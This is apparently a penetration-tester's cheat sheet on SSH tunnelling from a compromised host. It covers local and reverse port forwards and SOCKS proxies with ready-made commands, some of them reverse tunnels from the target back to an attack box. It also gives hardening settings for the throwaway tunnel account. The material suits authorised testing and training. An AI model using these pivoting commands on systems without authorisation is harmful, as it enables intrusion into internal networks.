SSH Port Forwarding
Security Considerations
Reverse Tunneling
- This will require you to establish a SSH connection from the foothold back to your attack box.
- You want to mitigate any potential for this authentication to be used against you
Public Key Authentication
- Say you have a throwaway account named
junkuser
for the purpose of tunneling - The SSH public key will be placed in
/home/junkuser/.ssh/authorized_keys
- With public key authentication, you can add options to the authorized key file
Example: authorized_keys
command="echo 'This account is for port forwarding only'",from="192.168.1.11,192.168.1.12",no-user-rc,no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa public-key-here
Password Authentication
- Public key authentication would be a better choice, because it is much easier to manage key files
- If you must use passwords, you can add a
Match
statement to your/etc/ssh/sshd_config
file to constrain the user- You can combine SSH public key with the
Match
statement, as well, create a more constrained configuration
- You can combine SSH public key with the
- Say you have a throwaway user named
junkuser
, just append the user match to the bottom of the config file
Example: sshd_config
Match junkuser
PermitRootLogin no
PermitTTY no
PermitUserRC no
ForceCommand "echo 'This account is for port forwarding only'"
PasswordAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 2
AllowAgentForwarding no
X11Forwarding no
X11UseLocalhost no
Individual Port Forwarding
- A service on a compromised host is listening on
127.0.0.1
- Open a port on attack box and forward traffic to remote port
Local Port to Remote Port
Step 1. Estabish SSH Tunnel from Local
[Attack Box] [+]==========[SSH]========>> [Remote]
127.0.0.1:[port] 127.0.0.1:[port]
[+] ^
|____________________________________|
Step 2. Forward Local Port to Remote Port
# Generic Command
# ---------------
# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port user@target
# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -i /path/to/private-key user@target
# Multiple Port Forward (as many -L as needed)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -L attack-ip:attack-port:remote-ip:remote-port user@target
# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L 127.0.0.1:43306:127.0.0.1:3306 user@target
# [+] Open port 43306 on 127.0.0.1 attack box
# [+] Forward to 127.0.0.1:3306 on remote via SSH tunnel
Reverse Local Port to Remote Port
Step 1. Estabish SSH Tunnel from Remote
[Attack Box] <<=========[SSH]========[+] [Remote]
127.0.0.1:[port] 127.0.0.1:[port]
[+] ^
|____________________________________|
Step 2. Reverse Forward Attack Box Port to Remote
# Generic Command
# ---------------
# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port user@attack-box-ip
# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -i /path/to/private/key user@attack-box-ip
# Multiple Port Forward (as many -R as needed)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -R attack-ip:attack-port:local-ip:local-port user@attack-box-ip
# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:43306:127.0.0.1:3306 user@attack-box-ip
# [+] Open port 43306 on 127.0.0.1 attack box
# [+] Reverse forward to 127.0.0.1:3306 on remote via SSH tunnel
Forward Dynamic SOCKS Proxy
- Create a SOCKS proxy that routes all traffic from attack box to the compromised host
- The compromised host is a transparent proxy and all packets exit out from the compromised host's interface
Step 1. Estabish SSH Tunnel from Local
____________
| |
[Attack Box] [+]=========[SSH]========>> [Remote] ===[Proxy Traffic]==>> | Remote |
/\ | Network(s) |
127.0.0.1:[port] || | |
[+] || ------------
|| ||
||_______________________________||
| Proxy Traffic |
|_________________________________|
Step 2. Create a Transparent SOCKS Proxy
with Remote Acting as Jump Host
# Generic Command
# ---------------
# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port user@target
# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port -i /path/to/private-key user@target
# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D 127.0.0.1:50001 user@target
# [+] Open port 50001 on 127.0.0.1 attack box
# [+] Forward transparently to any host routable via the target
Reverse Dynamic SOCKS Proxy
- REQUIRES AT LEAST OpenSSH Client 7.6!
- Create a SOCKS4 proxy that allows us to route all traffic from Kali through the tunnel on the specified port
- Convenient when SSH is running on a compromised host, but you don't have an SSH credential
- Create a dummy account on Kali, generate an SSH key pair, transfer the private key to the target
- Run on the target
Step 1. Estabish SSH Tunnel from Remote
____________
| |
[Attack Box] <<========[SSH]=========[+] [Remote] ===[Proxy Traffic]==>> | Remote |
/\ | Network(s) |
127.0.0.1:[port] || | |
[+] || ------------
|| ||
||_______________________________||
| Proxy Traffic |
|_________________________________|
Step 2. Create a Transparent Reverse SOCKS Proxy
with Remote Acting as Jump Host
# Generic Command
# ---------------
# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port user@attack-box-ip
# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port -i /path/to/private-key user@attack-box-ip
# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:50001 user@attack-box-ip
# [+] Open port 50001 on 127.0.0.1 attack box
# [+] Forward transparently to any host routable via the target